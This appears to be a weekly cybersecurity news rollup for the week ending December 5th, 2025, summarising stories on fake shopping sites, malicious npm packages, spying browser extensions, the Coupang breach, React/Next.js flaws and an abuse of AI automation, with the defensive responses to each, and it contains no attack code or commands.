Weekly Cyber News Rollup, December 5th, 2025
This is your weekly cyber news roll up for the week ending December 5th, 2025.
You can also subscribe to the newsletter and view the archive of previous headlines at daily cyber dot news.
Attackers are flooding the holiday season with fake festive shopping sites that mimic well known retailers and couriers. Researchers have tracked more than eighteen thousand such domains that copy logos, checkout pages, and those reassuring padlock icons. This matters right now because rushed mobile shoppers are being siphoned into bogus checkouts where every payment can turn into stolen card data or counterfeit goods. Consumers, card issuers, and brands that run heavy Christmas and Black Friday promotions are all feeling the sting as complaints and chargebacks climb. Today the response is focused on watching new look alike domains, tightening filters on holiday themed lures, and refreshing safe shopping guidance before the rush peaks.
Researchers in a separate study have spotted more than two thousand cloned online stores parked right beside real Cyber Monday deals. These fake sites copy layouts, logos, and even review snippets from genuine merchants, then quietly route payments through attacker controlled gateways. The situation matters this week because discount hunters are sliding into a shadow marketplace where every checkout could be pure card theft. Smaller and mid sized online merchants that rely on shared platforms, along with their payment processors and acquiring banks, are the most exposed. Current efforts center on tightening merchant verification, ramping up brand impersonation takedowns, and steering customers toward clearly verified official storefronts.
Security researchers have also turned a spotlight on popular developer paste and quick formatting tools that are quietly holding thousands of passwords and secret keys. Many engineers use these web utilities to clean up configuration files, logs, or code snippets before sharing them, assuming the content disappears quickly. Reality looks different this week because some sites store pastes for long periods, log them for analytics, or leave them discoverable through guessable links that attackers and search engines can find. Distributed engineering teams and sectors like finance, healthcare, and critical infrastructure that share configs during incidents are particularly exposed. Right now the push is toward banning unmanaged paste tools for sensitive data, offering secure internal alternatives, and routinely searching for leaked credentials tied to corporate domains.
A long running campaign linked to North Korean operators is using nearly two hundred malicious software packages to trap developers in public repositories. These packages pose as helpful add ons or utilities but hide installation scripts that pull down malware once they get added to a build. The issue matters today because it quietly converts trusted development environments into stepping stones for espionage and theft without any obvious user mistake. Software vendors, technology startups, and teams that allow direct internet access from build servers or let developers choose packages without review are squarely in the danger zone. Immediate defensive work is focused on allow lists for critical ecosystems, deeper inspection of package metadata and install scripts, and tighter monitoring of build environments for strange outbound traffic or new tools.
Millions of users running Chrome and Edge installed seemingly harmless extensions that turned out to be part of the ShadyPanda spying campaign. These add ons offered real convenience features on the surface, yet under the hood they could run remote code and siphon data from visited sites. The story matters now because everyday browsing, including access to work software as a service and sensitive business portals, has been turned into a rich stream of credentials and session tokens. Organizations that lean heavily on browser based customer relationship management, human resources, and finance tools are especially exposed since stolen sessions can bypass strong logins. Current actions focus on auditing and removing unnecessary extensions, shrinking to a small approved list, and watching remaining add ons for unusual network calls.
Investigators have tied nominally commercial Chinese front companies to advanced steganography products tailored for government aligned hacking teams. These tools make it simple to hide commands, stolen data, and malicious payloads inside normal looking images and documents that flow through email, chat, and collaboration platforms. The development is important this week because it shows steganography moving from rare specialty tradecraft into off the shelf gear for day to day campaigns. High value government networks, telecom providers, and large enterprises that rely on media rich portals and image heavy workflows are most at risk. Defenders are responding by hardening monitoring around media and document flows, looking for odd image patterns and reuse, and exploring advanced inspection that can spot steganography like behavior in files and traffic.
In South Korea, attackers turned more than one hundred twenty thousand internet connected home cameras into a pipeline of intimate videos. They quietly recorded people in bedrooms, living rooms, and bathrooms, then sold that footage through an adult site that industrialized voyeurism with consumer smart devices. The story matters today because it shows how weak default security and poor monitoring can transform household hardware into a long running privacy catastrophe. Any business that sells, deploys, or manages cameras or smart devices, along with organizations that rely on unmanaged cameras in offices, hotels, clinics, or campuses, is implicated by this model. Current responses emphasize stronger authentication and encryption, blocking direct internet exposure, and regularly checking that only approved services can reach live camera feeds in asset and log reviews.
Security teams have linked nearly two hundred malicious software packages in a major JavaScript ecosystem to North Korean actors. These packages were uploaded to public registries where developers routinely pull dependencies and often masqueraded as useful tools or misspelled versions of real libraries. The development matters now because those packages have been downloaded tens of thousands of times, likely reaching real build systems and production pipelines. Organizations that lean on open source packages with default trust, especially where developer devices and continuous integration servers sit outside strict hardening, are most at risk. Defenders are responding by enforcing approved registries and package allow lists, locking down build environments, and reviewing code and traffic to ensure no unvetted dependencies are sliding into production.
Shopping giant Coupang has provided a more formal disclosure that attackers accessed personal information on about thirty four million customers over roughly five months. The exposed data includes names, contact details, addresses, and partial payment information, though the company says passwords and full card numbers were not taken. This update matters because long dwell time combined with tight privacy laws can compound both reputational damage and regulatory penalties. Customers in a flagship digital brand market, along with partners, regulators, and card issuers, are demanding clearer answers on detection and data handling. Current work focuses on tightening monitoring and segmentation around customer data platforms and running reviews to ensure anomalous data access and long lived sessions would be detected faster in the future.
A new Android security update has landed with fixes for two vulnerabilities already exploited in targeted attacks along with more than one hundred additional flaws. These exploited bugs could allow attackers to escalate privileges or bypass key protections on affected phones and tablets depending on the specific stack. The issue is pressing because Android updates must travel through both Google and device makers, so many devices will not receive patches quickly. Executives, frontline staff, and operational teams using unmanaged or bring your own Android fleets are particularly exposed as these devices quietly age out of proper update cycles. Priority actions now include pushing high risk users onto the latest security patch levels and confirming through mobile device management reports which builds remain unsupported or out of date.
Researchers have demonstrated how low code automation features in Claude can be abused to deliver MedusaLocker ransomware across an organization. By chaining skills that move files, invoke scripts, and touch external systems, an attacker with one stolen account can turn a friendly workflow into a rapid malware pipeline. This matters right now because it shows artificial intelligence automation acting as a new control plane that can move data and code at scale, not just a simple helper. Organizations that allow artificial intelligence platforms to touch production file shares, ticketing systems, or cloud resources without strong guardrails are the most exposed. Defenders are starting to treat automation platforms like privileged access systems, adding strict scoping, change review for powerful workflows, and detailed execution logging to spot abuse patterns.
Attackers are pushing a fake Atlas browser that pretends to be a premium ChatGPT style client but actually installs password stealing malware. The ClickFix campaign uses polished marketing pages and social posts to convince people they are getting faster or cheaper access to artificial intelligence tools. This threat matters today because the malware quietly harvests saved passwords, cookies, and session tokens from mainstream browsers, then uses them to open corporate mail, cloud dashboards, or banking sites without new logins. Companies with bring your own device policies and weak separation between work and personal browsing are particularly exposed as home experiments jump into work accounts. Security teams are responding by blocking unapproved browser like executables, reinforcing training about downloading artificial intelligence tools only from vetted sources, and tightening controls around how corporate credentials are stored in personal browsers.
Researchers have disclosed a pair of maximum severity flaws affecting core services used by many cloud providers, raising the possibility of cross tenant data access. In worst case scenarios, a malicious tenant could escape their own environment and reach resources belonging to other customers sharing the same infrastructure. The discovery matters right now because early estimates suggest more than a third of providers might use the impacted components, and not all have finished mitigation. Companies that lean on multi tenant platform services instead of dedicated instances are especially exposed if noisy neighbors turn hostile. Customers are pressing providers for written impact statements, patch status, and detection details while aligning internal monitoring to look for unusual cross account access patterns and spikes in permission failures on newly patched services.
Finally, a critical set of bugs in React Server Components and the Next Jay S framework has exposed some modern web applications to unauthenticated remote code execution. An attacker who can reach a vulnerable endpoint may be able to run arbitrary code on the servers behind customer facing sites. This matters this week because those versions are common in high traffic marketing, account, and self service portals, and proof of concept exploits are already public. Organizations that use these frameworks for dashboards, checkout flows, or support portals are among the most exposed when server side components hold secrets and business logic. Teams are now fast tracking framework upgrades for exposed apps, adding temporary web application firewall rules for known exploit patterns, and combing server logs for any signs of successful code execution during the vulnerable window.
That’s the BareMetalCyber Weekly Roll-Up for the week ending December 5th, 2025. For more, visit BareMetalCyber dot com. You can also subscribe to the newsletter and view the archive of previous headlines at daily cyber news dot com. We’ll be back next week.
